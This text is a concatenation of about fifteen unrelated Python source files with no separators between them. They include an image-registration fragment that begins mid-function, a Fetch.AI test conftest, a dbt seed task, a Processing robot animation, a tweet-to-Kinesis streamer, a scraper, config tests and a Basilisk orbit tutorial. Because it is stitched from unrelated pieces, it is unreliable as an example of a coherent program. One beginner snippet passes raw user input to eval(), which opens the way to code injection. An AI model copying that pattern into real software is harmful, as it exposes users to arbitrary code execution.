composed_disp.cpu().numpy() # (2, 2, 3, d, h, w) inter = interpolate.RegularGridInterpolator(grid_tuple, np.moveaxis(composed_disp_np[0, 1], 0, -1)) calc_landmark_disp = inter(landmark_00_converted) diff = (np.sum(((calc_landmark_disp - landmark_disp)*pixel_spacing)**2, 1))**0.5 diff_stats.append([i, np.mean(diff), np.std(diff)]) print(f'\ndiff: {np.mean(diff):.2f}+-{np.std(diff):.2f}({np.max(diff):.2f})') diff_stats = np.array(diff_stats) res['composed_disp_np'] = composed_disp_np states = {'config': config, 'model': regnet.state_dict(), 'optimizer': optimizer.state_dict(), 'registration_result':res, 'loss_list':stop_criterion.loss_list, 'diff_stats':diff_stats} index = len([file for file in os.listdir(states_folder) if file.endswith('pth')]) states_file = f'reg_dirlab_case{case}_{index:03d}.pth' torch.save(states, os.path.join(states_folder, states_file)) logging.info(f'save model and optimizer state {states_file}') plt.figure(dpi = plot_dpi) plt.plot(stop_criterion.loss_list, label = 'simi') plt.title('similarity loss vs iteration') 1-10 from film import models from base.repository import BaseRepository class MovieRepository(BaseRepository): class Meta: model = models.Movie class SeriesRepository(BaseRepository): class Meta: model = models.Series # -*- coding: utf-8 -*- # ------------------------------------------------------------------------------ # # Copyright 2018-2019 Fetch.AI Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
# # ------------------------------------------------------------------------------ """Conftest module for Pytest.""" import asyncio import inspect import logging import gym import os import socket import sys import time from asyncio import CancelledError from threading import Timer from typing import Optional, Set import docker as docker import pytest from docker.models.containers import Container from oef.agents import AsyncioCore, OEFAgent from aea import AEA_DIR from aea.configurations.base import ConnectionConfig from aea.connections.base import Connection from aea.mail.base import Envelope logger = logging.getLogger(__name__) CUR_PATH = os.path.dirname(inspect.getfile(inspect.currentframe())) # type: ignore ROOT_DIR = os.path.join(CUR_PATH, "..") CLI_LOG_OPTION = ["-v", "OFF"] CONFIGURATION_SCHEMA_DIR = os.path.join(AEA_DIR, "configurations", "schemas") AGENT_CONFIGURATION_SCHEMA = os.path.join(CONFIGURATION_SCHEMA_DIR, "aea-config_schema.json") SKILL_CONFIGURATION_SCHEMA = os.path.join(CONFIGURATION_SCHEMA_DIR, "skill-config_schema.json") CONNECTION_CONFIGURATION_SCHEMA = os.path.join(CONFIGURATION_SCHEMA_DIR, "connection-config_schema.json") PROTOCOL_CONFIGURATION_SCHEMA = os.path.join(CONFIGURATION_SCHEMA_DIR, "protocol-config_schema.json") DUMMY_ENV = gym.GoalEnv def pytest_addoption(parser): """Add options to the parser.""" parser.addoption("--ci", action="store_true", default=False) parser.addoption("--no-integration-tests", action="store_true", default=False, help="Skip integration tests.") @pytest.fixture(scope="session") def oef_addr() -> str: """IP address pointing to the OEF Node to use during the tests.""" return "127.0.0.1" @pytest.fixture(scope="session") def oef_port() -> int: """Port of the connection to the OEF Node to use during the tests.""" return 10000 def tcpping(ip, port) -> bool: """Ping TCP port.""" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, int(port))) s.shutdown(2) return True except Exception as e: logger.exception(e) return False class DummyConnection(Connection): """A dummy connection that just stores the messages.""" restricted_to_protocols = set() # type: Set[str] def __init__(self, connection_id: str = "dummy", restricted_to_protocols: Optional[Set[str]] = None): """Initialize.""" super().__init__(connection_id=connection_id, restricted_to_protocols=restricted_to_protocols) self.connection_status.is_connected = False self._queue = None async def connect(self, *args, **kwargs): """Connect.""" self._queue = asyncio.Queue(loop=self.loop) self.connection_status.is_connected = True async def disconnect(self, *args, **kwargs): """Disconnect.""" await self._queue.put(None) self.connection_status.is_connected = False async def send(self, envelope: 'Envelope'): """Send an envelope.""" assert self._queue is not None self._queue.put_nowait(envelope) async def receive(self, *args, **kwargs) -> Optional['Envelope']: """Receive an envelope.""" try: assert self._queue is not None envelope = await self._queue.get() if envelope is None: logger.debug("Received none envelope.") return None return envelope except CancelledError: return None except Exception as e: print(str(e)) return None def put(self, envelope: Envelope): """Put an envelope in the queue.""" assert self._queue is not None self._queue.put_nowait(envelope) @classmethod def from_config(cls, public_key: str, connection_configuration: ConnectionConfig) -> 'Connection': """Return a connection obj fom a configuration.""" class OEFHealthCheck(object): """A health check class.""" def 
__init__(self, oef_addr: str, oef_port: int, loop: Optional[asyncio.AbstractEventLoop] = None): """ Initialize. :param oef_addr: IP address of the OEF node. :param oef_port: Port of the OEF node. """ self.oef_addr = oef_addr self.oef_port = oef_port self._result = False self._stop = False self._core = AsyncioCore() self.agent = OEFAgent("check", core=self._core, oef_addr=self.oef_addr, oef_port=self.oef_port) self.agent.on_connect_success = self.on_connect_ok self.agent.on_connection_terminated = self.on_connect_terminated self.agent.on_connect_failed = self.exception_handler def exception_handler(self, url=None, ex=None): """Handle exception during a connection attempt.""" print("An error occurred. Exception: {}".format(ex)) self._stop = True def on_connect_ok(self, url=None): """Handle a successful connection.""" print("Connection OK!") self._result = True self._stop = True def on_connect_terminated(self, url=None): """Handle a connection failure.""" print("Connection terminated.") self._stop = True def run(self) -> bool: """ Run the check, asynchronously. :return: True if the check is successful, False otherwise. """ self._result = False self._stop = False def stop_connection_attempt(self): if self.agent.state == "connecting": self.agent.state = "failed" t = Timer(1.5, stop_connection_attempt, args=(self, )) try: print("Connecting to {}:{}...".format(self.oef_addr, self.oef_port)) self._core.run_threaded() t.start() self._result = self.agent.connect() self._stop = True if self._result: print("Connection established. Tearing down connection...") self.agent.disconnect() t.cancel() else: print("A problem occurred. Exiting...") except Exception as e: print(str(e)) finally: t.join(1.0) self.agent.stop() self.agent.disconnect() self._core.stop() return self._result def _stop_oef_search_images(): """Stop the OEF search image.""" client = docker.from_env() for container in client.containers.list(): if "fetchai/oef-search:0.7" in container.image.tags: logger.info("Stopping existing Docker image...") container.stop() def _wait_for_oef(max_attempts: int = 15, sleep_rate: float = 1.0): """Wait until the OEF is up.""" success = False attempt = 0 while not success and attempt < max_attempts: attempt += 1 logger.info("Attempt {}...".format(attempt)) oef_healthcheck = OEFHealthCheck("127.0.0.1", 10000) result = oef_healthcheck.run() if result: success = True else: logger.info("OEF not available yet - sleeping for {} second...".format(sleep_rate)) time.sleep(sleep_rate) return success def _create_oef_docker_image(oef_addr_, oef_port_) -> Container: client = docker.from_env() logger.info(ROOT_DIR + '/tests/common/oef_search_pluto_scripts') ports = {'20000/tcp': ("0.0.0.0", 20000), '30000/tcp': ("0.0.0.0", 30000), '{}/tcp'.format(oef_port_): ("0.0.0.0", oef_port_)} volumes = {ROOT_DIR + '/tests/common/oef_search_pluto_scripts': {'bind': '/config', 'mode': 'rw'}, ROOT_DIR + '/data/oef-logs': {'bind': '/logs', 'mode': 'rw'}} c = client.containers.run("fetchai/oef-search:0.7", "/config/node_config.json", detach=True, ports=ports, volumes=volumes) return c @pytest.fixture(scope="session") def network_node(oef_addr, oef_port, pytestconfig): """Network node initialization.""" if sys.version_info < (3, 7): pytest.skip("Python version < 3.7 not supported by the OEF.") if pytestconfig.getoption("no_integration_tests"): pytest.skip('skipped: no OEF running') return if pytestconfig.getoption("ci"): logger.warning("Skipping creation of OEF Docker image...") success = _wait_for_oef(max_attempts=10, sleep_rate=2.0) if 
not success: pytest.fail("OEF doesn't work. Exiting...") else: yield return else: _stop_oef_search_images() c = _create_oef_docker_image(oef_addr, oef_port) c.start() # wait for the setup... logger.info("Setting up the OEF node...") success = _wait_for_oef(max_attempts=10, sleep_rate=2.0) if not success: c.stop() c.remove() pytest.fail("OEF doesn't work. Exiting...") else: logger.info("Done!") time.sleep(1.0) yield logger.info("Stopping the OEF node...") c.stop() c.remove() def get_unused_tcp_port(): """Get an unused TCP port.""" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("", 0)) s.listen(1) port = s.getsockname()[1] s.close() return port import random from .run import ModelRunner, RunTask from .printer import ( print_run_end_messages, ) from dbt.contracts.results import RunStatus from dbt.exceptions import InternalException from dbt.graph import ResourceTypeSelector from dbt.logger import TextOnly from dbt.events.functions import fire_event from dbt.events.types import ( SeedHeader, SeedHeaderSeperator, EmptyLine, PrintSeedErrorResultLine, PrintSeedResultLine, PrintStartLine ) from dbt.node_types import NodeType from dbt.contracts.results import NodeStatus class SeedRunner(ModelRunner): def describe_node(self): return "seed file {}".format(self.get_node_representation()) def before_execute(self): fire_event( PrintStartLine( description=self.describe_node(), index=self.node_index, total=self.num_nodes, report_node_data=self.node ) ) def _build_run_model_result(self, model, context): result = super()._build_run_model_result(model, context) agate_result = context['load_result']('agate_table') result.agate_table = agate_result.table return result def compile(self, manifest): return self.node def print_result_line(self, result): model = result.node if result.status == NodeStatus.Error: fire_event( PrintSeedErrorResultLine( status=result.status, index=self.node_index, total=self.num_nodes, execution_time=result.execution_time, schema=self.node.schema, relation=model.alias, report_node_data=model ) ) else: fire_event( PrintSeedResultLine( status=result.message, index=self.node_index, total=self.num_nodes, execution_time=result.execution_time, schema=self.node.schema, relation=model.alias, report_node_data=model ) ) class SeedTask(RunTask): def defer_to_manifest(self, adapter, selected_uids): # seeds don't defer return def raise_on_first_error(self): return False def get_node_selector(self): if self.manifest is None or self.graph is None: raise InternalException( 'manifest and graph must be set to get perform node selection' ) return ResourceTypeSelector( graph=self.graph, manifest=self.manifest, previous_state=self.previous_state, resource_types=[NodeType.Seed], ) def get_runner_type(self, _): return SeedRunner def task_end_messages(self, results): if self.args.show: self.show_tables(results) print_run_end_messages(results) def show_table(self, result): table = result.agate_table rand_table = table.order_by(lambda x: random.random()) schema = result.node.schema alias = result.node.alias header = "Random sample of table: {}.{}".format(schema, alias) with TextOnly(): fire_event(EmptyLine()) fire_event(SeedHeader(header=header)) fire_event(SeedHeaderSeperator(len_header=len(header))) rand_table.print_table(max_rows=10, max_columns=None) with TextOnly(): fire_event(EmptyLine()) def show_tables(self, results): for result in results: if result.status != RunStatus.Error: self.show_table(result) MastaCoder/Projects1-10 # Main Robot Drawing robot = [ # [partOfRobot, Type, Parent, 
Position/Values] # Rect: x, y, w, h [False, 'fill', 'ground', [160, 82, 45]], [False, 'rect', 'ground', [0, 500, 800, 100]], [False, 'fill', 'feet', [0, 0, 0]], [True, 'rect', 'foot_l', [275, 475, 60, 25]], [True, 'rect', 'foot_r', [390, 475, 60, 25]], [False, 'fill', 'legs', [150, 150, 150]], [True, 'rect', 'leg_l', [310, 375, 25, 100]], [True, 'rect', 'leg_r', [390, 375, 25, 100]], [False, 'fill', 'box', [140, 140, 140]], [False, 'fill', 'arms', [150, 150, 150]], [True, 'rect', 'arm_l', [210, 230, 100, 25]], [True, 'rect', 'arm_r', [415, 230, 100, 25]], [False, 'fill', 'arms', [130, 130, 130]], [True, 'rect', 'fingers_l', [190, 230, 20, 10]], [True, 'rect', 'fingers_l', [190, 245, 20, 10]], [True, 'rect', 'fingers_r', [515, 230, 20, 10]], [True, 'rect', 'fingers_r', [515, 245, 20, 10]], # Moving Parts [False, 'fill', 'neck', [150, 150, 150]], [True, 'rect', 'neck', [350, 205, 25, 20]], [True, 'rect', 'broadcast', [359, 150, 5, 55]], [False, 'fill', 'bulb', [255, 0, 0]], [True, 'ellipse', 'bulb', [361, 150, 15, 15]], [False, 'fill', 'ears', [145, 145, 145]], [True, 'rect', 'wing_l', [307, 160, 70, 15]], [True, 'rect', 'ear_l', [313, 155, 12, 25]], [True, 'rect', 'wing_r', [348, 160, 70, 15]], [True, 'rect', 'ear_r', [400, 155, 12, 25]], # End Moving [False, 'fill', 'body', [130, 130, 130]], [True, 'rect', 'body', [310, 225, 105, 175]], [True, 'rect', 'box', [325, 240, 75, 40]], [False, 'fill', 'button_1', [225, 225, 225]], [True, 'ellipse', 'button_1', [345, 260, 20, 20]], [False, 'fill', 'button_2', [225, 225, 225]], [True, 'ellipse', 'button_2', [380, 260, 20, 20]], [False, 'fill', 'head', [170, 170, 170]], [True, 'rect', 'head', [325, 130, 75, 75]], [False, 'fill', 'eyes', [255, 255, 255]], [True, 'rect', 'eye_l', [335, 145, 15, 15]], [True, 'rect', 'eye_r', [375, 145, 15, 15]], [False, 'fill', 'pupils', [0, 0, 0]], [True, 'rect', 'pupil_l', [339, 149, 7, 7]], [True, 'rect', 'pupil_r', [379, 149, 7, 7]], [True, 'rect', 'mouth', [343, 180, 40, 5]], [False, 'textsize', 32], [True, 'text', ["M-Robo 7000", 100, 100]], ] tick = 0 moveable = ['wing_l', 'wing_r', 'bulb', 'broadcast', 'head', 'ear_l', 'ear_r', 'pupil_l', 'pupil_r', 'eye_l', 'eye_r', 'mouth'] mov = [0, 0] fall = False button = [False, False] hover = [0, 0] head = [0, 0] # First setup def setup(): print("Script is running..") size(800, 600) # Size of window (w, h) # Main loop def draw(): global robot, mov, hover, tick tick += 1 if hover[0] == 1: if hover[1] <= 60: hover[1] += 1 else: hover[0] = 2 elif hover[0] == 0 and hover[1] > 0: hover[1] -= 1 if fall and mov[1] < 400: mov[1] += 8 elif not fall and mov[1] > 0: mov[1] -= 8 # Done every loop clear() background(135, 206, 235) # Loop and create. for part in robot: if part[0]: y = 0 x = mov[0] if fall or (not fall and mov[1] > 0): print("fell", mov[1]) if mov[1] + part[3][3] + part[3][1] >= 500: y = 500 - part[3][3] - part[3][1] else: y = mov[1] elif hover[0] >= 1 or (hover[0] == 0 and hover[1] > 0): if part[2] == "wing_l": x += hover[1] * -1 / 2 elif part[2] == "wing_r": x += hover[1] / 2 elif part[2] == "broadcast" or part[2] == "bulb": y += hover[1] * -1 elif part[2] == "neck": y += hover[1] if hover[0] == 2 and part[2] in moveable: x += head[0] y += head[1] pushMatrix() translate(x, y) # Is part an object? 
if part[1] == "fill": if button[0] and part[2] == "button_1": part[3][1] = 0 part[3][2] = 0 elif part[2] == "button_1": part[3][1] = 225 part[3][2] = 225 if button[1] and part[2] == "button_2": part[3][1] = 0 part[3][2] = 0 elif part[2] == "button_2": part[3][1] = 225 part[3][2] = 225 fill(part[3][0], part[3][1], part[3][2]) elif part[1] == "rect": rect(part[3][0], part[3][1], part[3][2], part[3][3]) elif part[1] == "ellipse": ellipse(part[3][0], part[3][1], part[3][2], part[3][3]) elif part[1] == "text": text(part[3][0], part[3][1], part[3][2]) elif part[1] == "textsize": textSize(part[3]) else: print("Value does not exist!") if part[0]: popMatrix() def keyPressed(): global key, mov, fall, hover if key == "a" and mov[0] > -190: if hover[0] == 2: head[0] -= 5 else: mov[0] -= 5 if key == "d" and mov[0] < 265: if hover[0] == 2: head[0] += 5 else: mov[0] += 5 if key == "w" and head[1] > -100: if hover[0] == 2: head[1] -= 8 if key == "s": print(head[1]) if hover[0] == 2 and head[1] <= 0: head[1] += 10 if key == "b": if hover[0] == 0: fall = not fall button[0] = not button[0] if key == "f": goHover() print("mov", mov) def mouseClicked(): global mouseX, mouseY, button, fall if mouseX in range(335 + mov[0], 356 + mov[0]) and mouseY in range(250 + mov[1], 271 + mov[1]): button[0] = not button[0] fall = not fall elif mouseX in range(370 + mov[0], 390 + mov[0]) and mouseY in range(250 + mov[1], 271 + mov[1]): goHover() print(mouseX, mouseY) def goHover(): global hover if hover[0] == 0: hover[0] = 1 elif hover[0] == 2 and head[0] in range(-10, 10) and head[1] in range(-10, 10): hover[0] = 0 else: return button[1] = not button[1] import logging import boto3 from configparser import ConfigParser from botocore.exceptions import ClientError from tweepy import StreamListener, Stream, OAuthHandler class TweetListener(StreamListener): def __init__(self, config): super(StreamListener, self).__init__() self.config = config self.aws_access_key_id = self.config.get("aws", "access_key_id") self.aws_secret_access_key = self.config.get("aws", "secret_access_key") self.delivery_stream = self.config.get("kinesis", "delivery_stream") self.firehose_client = boto3.client("firehose", aws_access_key_id=self.aws_access_key_id, aws_secret_access_key=self.aws_secret_access_key) def on_data(self, tweet): """ Push matching tweets to Kinesis. :param tweet: Tweet data as dict :return: """ try: logging.info("Pushing tweet data to Kinesis") response = self.firehose_client.put_record(DeliveryStreamName=self.delivery_stream, Record={ "Data": tweet }) logging.debug(response) return True except ClientError as ex: logging.exception(f"Could not push tweet data to Kinesis: {ex}") def on_error(self, status_code): """ Handle errors. 
:param status_code: HTTP status code :return: """ logging.error(status_code) # https://tweepy.readthedocs.io/en/latest/streaming_how_to.html#handling-errors if status_code == 420: return False if __name__ == "__main__": # load config config = ConfigParser(converters={"list": lambda x: [e.strip() for e in x.split(",")]}) config.read("app.cfg") # start logging logging.basicConfig(level=config.get("logging", "level"), format="%(asctime)s - %(levelname)s - %(message)s") logging.info("Started") # authenticate to twitter API logging.info("Authenticating to Twitter") auth = OAuthHandler(config.get("twitter", "consumer_key"), config.get("twitter", "consumer_secret")) auth.set_access_token(config.get("twitter", "access_token"), config.get("twitter", "access_token_secret")) # start streaming logging.info(f"Start streaming tweets matching: {config.getlist('tweepy', 'track_topics')}") twitter_stream = Stream(auth, TweetListener(config)) twitter_stream.filter(track=config.getlist("tweepy", "track_topics"), languages=config.getlist("tweepy", "track_langs")) from __future__ import print_function import os import sys from pyspark.sql import SparkSession from pyspark.sql.types import Row, StructField, StructType, StringType, IntegerType, ArrayType from pyspark.sql.functions import col, split, udf, size, element_at, explode, when, lit import pyspark.sql.functions as F # this process is just to subset the data into a smaller subset # for easy checking of processes path = '/opt/spark-data' spark = SparkSession \ .builder \ .appName("S3_Analysis") \ .master("spark://spark-master:7077") \ .config("spark.executor.cores", "8") \ .config("spark.executor.memory", "16g") \ .config("spark.num.executors", "2") \ .enableHiveSupport() \ .getOrCreate() s3_stats = spark.read.parquet(os.path.join(path, "s3logs")) s3_stats.createOrReplaceTempView("s3_stats") subset = spark.sql("SELECT * FROM s3_stats LIMIT 100000") subset.write.mode("overwrite").parquet(os.path.join(path, "small_logs")) spark.stop()setup.py from setuptools import setup, find_packages # name is the package name in pip, should be lower case and not conflict with existing packages # packages are code source setup( name="astrosimon", version="0.8.5", description="Simulation Monitor for computational astrophysics", url="https://github.com/maxwelltsai/SiMon", author=", ", author_email="", license="BSD 2-Clause", packages=find_packages(), zip_safe=False, install_requires=["python-daemon", "numpy"], entry_points={ "console_scripts": ["simon = SiMon.simon:main"], }, ) name = input("What's your name? 
") print("Nice to meet you " + name + "!\n") cities_lithuania = input("Largest cities in Lithuania: ") print(cities_lithuania, type(cities_lithuania)) cities_lithuania = eval(input("Largest cities in Lithuania (example: [\"Vilnius\", \"Kaunas\"]): ")) print(cities_lithuania, type(cities_lithuania), "\n") Iamdavidonuh/getmusic from engine.root import BaseEngine """Figure out a way to combine both ftch and search""" """Also find a way to differentiate between album and track children when using Search not Fetch""" class JustNaija(BaseEngine): engine_name = "justnaija" page_path = "page" album_path = "album" album_category = "music" tracks_page_path = "music-mp3" def __init__(self): super().__init__() self.site_uri = "https://justnaija.com/" self.request_method = self.GET def get_url_path(self, page=None, category=None): # if page return ( (self.tracks_page_path, self.page_path, str(page)) if category == self.TRACK else (self.album_category, self.album_path, self.page_path, str(page)) ) def search(self, query=None, page=None, category=None, **kwargs): soup = self.get_soup(url=self.get_formated_url(category="albums", page=2)) response = self.parse_parent_object(soup) print(response) return response def parse_parent_object(self, soup): return list(elem["href"] for elem in soup.select("main article h3 a")) def parse_object(self, soup, category=None): header_elem = soup.select('div[class="mpostheader"] span[class="h1"]')[0] try: download_link = soup.select('p[class="song-download"] a')[0]["href"] except Exception: download_link = None art_link = soup.select('figure[class="song-thumbnail"] img')[0]["src"] if category == self.TRACK: artist, title = header_elem.text.split("] ")[1].split(" – ") return artist, title = header_elem.text.split(" | ")[0].split(" – ") tracklist_elem = soup.select( 'div[class="mu-o-c"] div[class="mu-o-unit-c"] div[class="album-side-1"]' ) for track_elem in tracklist_elem: song_link = track_elem.h4.a["href"] song_title = ( track_elem.h4.a.text + track_elem.span.text if track_elem.span != None else track_elem.h4.a.text ) return dict(artist=artist, title=title) """Tests for the config.py module.""" from pathlib import Path import pytest from metno_locationforecast.config import Config class TestConfig: class TestPossibleUserConfigFiles: def test_metno_locationforecast_file(self, monkeypatch): monkeypatch.setattr( Config, "cwd", Path("./tests/test_configs/test_metno_locationforecast_file/") ) config = Config() result = list(config.possible_user_config_files) expected = [ Path( "./tests/test_configs/test_metno_locationforecast_file/" "metno-locationforecast.ini" ) ] assert result == expected def test_setup_file(self, monkeypatch): monkeypatch.setattr(Config, "cwd", Path("./tests/test_configs/test_setup_file/")) config = Config() result = list(config.possible_user_config_files) expected = [Path("./tests/test_configs/test_setup_file/setup.cfg")] assert result == expected def test_multiple_files(self, monkeypatch): monkeypatch.setattr(Config, "cwd", Path("./tests/test_configs/test_multiple_files/")) config = Config() result = list(config.possible_user_config_files) expected = [ Path("./tests/test_configs/test_multiple_files/metno-locationforecast.ini"), Path("./tests/test_configs/test_multiple_files/setup.cfg"), ] assert result == expected def test_no_files(self, monkeypatch): monkeypatch.setattr(Config, "cwd", Path("./tests/test_configs/test_no_config_file/")) config = Config() result = list(config.possible_user_config_files) expected = [] assert result == expected class TestInit: 
def test_metno_locationforecast_file(self, monkeypatch): monkeypatch.setattr( Config, "cwd", Path("./tests/test_configs/test_metno_locationforecast_file/") ) config = Config() assert config.forecast_type == "metno_locationforecast_file" assert config.user_agent == "metno_locationforecast_file" assert config.save_location == "metno_locationforecast_file" assert config.base_url == "metno_locationforecast_file" assert config.user_config_file == str( Path( "./tests/test_configs/test_metno_locationforecast_file/" "metno-locationforecast.ini" ).resolve() ) def test_setup_file(self, monkeypatch): monkeypatch.setattr(Config, "cwd", Path("./tests/test_configs/test_setup_file/")) config = Config() assert config.forecast_type == "setup_file" assert config.user_agent == "setup_file" assert config.save_location == "setup_file" assert config.base_url == "setup_file" assert config.user_config_file == str( Path("./tests/test_configs/test_setup_file/setup.cfg").resolve() ) def test_precedence_of_files(self, monkeypatch): monkeypatch.setattr(Config, "cwd", Path("./tests/test_configs/test_multiple_files/")) config = Config() assert config.forecast_type == "metno_locationforecast_file" assert config.user_agent == "metno_locationforecast_file" assert config.save_location == "metno_locationforecast_file" assert config.base_url == "metno_locationforecast_file" assert config.user_config_file == str( Path( "./tests/test_configs/test_multiple_files/metno-locationforecast.ini" ).resolve() ) def test_no_files(self, monkeypatch): monkeypatch.setattr(Config, "cwd", Path("./tests/test_configs/test_no_config_file/")) config = Config() assert config.forecast_type == "compact" assert config.user_agent is None assert config.save_location == "./data" assert config.base_url == "https://api.met.no/weatherapi/locationforecast/2.0/" assert config.user_config_file is None def test_partial_configuration(self, monkeypatch): monkeypatch.setattr( Config, "cwd", Path("./tests/test_configs/test_partial_configuration/") ) config = Config() assert config.forecast_type == "compact" assert config.user_agent == "setup_file" assert config.save_location == "./data" assert config.base_url == "https://api.met.no/weatherapi/locationforecast/2.0/" assert config.user_config_file == str( Path("./tests/test_configs/test_partial_configuration/setup.cfg").resolve() ) def test_bad_configuration(self, monkeypatch): monkeypatch.setattr(Config, "cwd", Path("./tests/test_configs/test_bad_config_file/")) with pytest.warns(UserWarning): config = Config() assert config.forecast_type == "setup_file" assert config.user_agent == "setup_file" assert config.save_location == "./data" assert config.base_url == "https://api.met.no/weatherapi/locationforecast/2.0/" assert config.user_config_file == str( Path("./tests/test_configs/test_bad_config_file/setup.cfg").resolve() ) assert not hasattr(config, "not_a_real_configuration") # Copyright (c) Microsoft Corporation. # Licensed under the MIT license. from .version.version import name, version as __version__ # VITAL NOTE: ORDER MATTERS from .exceptions import DialectException, InvalidGraphError, UnweightedGraphError # load individual modules into the top level topologic namespace from .connected_components import number_connected_components, \ largest_connected_component, \ connected_components_generator from .partitioned_graph import PartitionedGraph from .graph_augmentation import rank_edges, diagonal_augmentation from . import similarity from . import io from . import projection from . import statistics from . 
import embedding from . import partition __all__ = [ 'connected_components_generator', 'DialectException', 'InvalidGraphError', 'largest_connected_component', 'number_connected_components', 'PartitionedGraph', 'diagonal_augmentation', 'UnweightedGraphError' ] start.py # -*- coding: utf-8 -*- """ start.py ~~~~~~~~~~~~~~~~~~~ :author: Finger :license: BSD, see LICENSE for more details. """ from apps.configs.config import CONFIG from apps.core.db.mongodb_config import MongoDBConfig from apps.core.utils.mongodb import update_collections from apps.core.db.mongodb import PyMongo print("* Check or update the database collection") mongodb_conf = MongoDBConfig() db_site = PyMongo() db_sys = PyMongo() db_user = PyMongo() db_init = 2 while db_init: db_site.init_app(config_prefix="MONGO_SITE", db_config=mongodb_conf.SITE_URI) db_sys.init_app(config_prefix="MONGO_SYS", db_config=mongodb_conf.SYS_URI) db_user.init_app(config_prefix="MONGO_USER", db_config=mongodb_conf.USER_URI) if db_init == 2: update_collections(db_sys=db_sys, db_site=db_site, db_user=db_user) db_init -= 1src/tests/scenarios/scenarioBasicOrbit.py ''' ''' ''' ISC License Copyright (c) 2016, Autonomous Vehicle Systems Lab, University of Colorado at Boulder Permission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies. THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. ''' # # Basilisk Scenario Script and Integrated Test # # Purpose: Integrated test of the spacecraftPlus() and gravity modules. Illustrates # a 3-DOV spacecraft on a range of orbit types. # Author: # Creation Date: Nov. 26, 2016 # import os import numpy as np import matplotlib.pyplot as plt # The path to the location of Basilisk # Used to get the location of supporting data. from Basilisk import __path__ bskPath = __path__[0] # import simulation related support from Basilisk.simulation import spacecraftPlus # general support file with common unit test functions # import general simulation support files from Basilisk.utilities import (SimulationBaseClass, macros, orbitalMotion, simIncludeGravBody, unitTestSupport) ## \defgroup Tutorials_1_0 ## @{ ## Demonstration of setup basic 3-DOF orbit simulation setup. # # Basic Orbit Setup and Translational Motion Simulation {#scenarioBasicOrbit} # ==== # # Scenario Description # ----- # This script sets up a 3-DOF spacecraft which is orbiting a planet. The purpose # is to illustrate how to create a spacecraft, attach a gravity model, and run # a basic Basilisk simulation. 
The scenarios can be run with the following setups # parameters: # Setup | orbitCase | useSphericalHarmonics | planetCase # ----- | ------------------- | --------------------- | ----------- # 1 | LEO | False | Earth # 2 | GTO | False | Earth # 3 | GEO | False | Earth # 4 | LEO | True | Earth # 5 | LEO | False | Mars # # To run the default scenario 1 from the Basilisk/scenarios folder, call the python script through # # python scenarioBasicOrbit.py # # *However*, to play with any scenario scripts as tutorials, you should make a copy of them into a custom folder # outside of the Basilisk directory. # # To copy them, first find the location of the Basilisk installation. # After installing, you can find the installed location of Basilisk by opening a python interpreter and # running the commands: # #~~~~~~~~~~~~~~{.py} # import Basilisk # basiliskPath = Basilisk.__path__[0] # print(basiliskPath) #~~~~~~~~~~~~~~ # # Copy the folder `{basiliskPath}/tests` into a new folder in a different directory. # Now, when you want to use a tutorial, navigate inside that folder, and edit and execute the *copied* integrated tests. # # Qt Visualization Option # ----- # If you wish to transmit the simulation data to the Qt Visualization, uncomment the following # line (line 360 in the script) from the python scenario script. If the Viz is running and searching for a connection on # 127.0.0.1 (using the Open Connection command from the File menu), the simulation is visualized in # realtime. #~~~~~~~~~~~~~~{.py} # unitTestSupport.enableVisualization(scSim, dynProcess, simProcessName, 'earth') # The Viz only supports 'earth', 'mars', or 'sun' #~~~~~~~~~~~~~~ # The current Qt-based visualization is only able to show orbits about either Earth, Mars or the sun. # Be sure to match the celestial object name in the line above with the current simulation. # Further, note that by default the Viz is running in realtime mode with a 1x speed up factor. This Viz # speed up factor can be increased in the Qt GUI by calling up the # # View/Bottom Playback Controls # # The speed up factor is adjusted in 2x steps up or down using the green arrows in this GUI. # The visualization is only updated at the rate of the simulation. Thus, for this orbit simulation with 10s # time steps the Viz will be choppy at 1x. Speeding up the Viz playback with the green arrows quickly illustrates # the orbital motion. # # # Simulation Scenario Setup Details # ----- # The simulation layout is shown in the following illustration. A single simulation process is created # which contains the spacecraft object. Gravity effectors are attached to the spacecraft dynamics to # simulate the gravitational accelerations. # ![Simulation Flow Diagram](Images/doc/test_scenarioBasicOrbit.svg "Illustration") # # When the simulation completes, 2 plots are shown for each case. One plot always shows # the inertial position vector components, while the second plot either shows a planar # orbit view relative to the perifocal frame (no spherical harmonics), or the # semi-major axis time history plot (with spherical harmonics turned on). # # The dynamics simulation is set up using a SpacecraftPlus() module. #~~~~~~~~~~~~~~~~~{.py} # scObject = spacecraftPlus.SpacecraftPlus() # scObject.ModelTag = "spacecraftBody" #~~~~~~~~~~~~~~~~~ # Note that this module simulates both the translational and rotational motion of the spacecraft. # In this scenario only the translational (i.e. orbital) motion is tracked. 
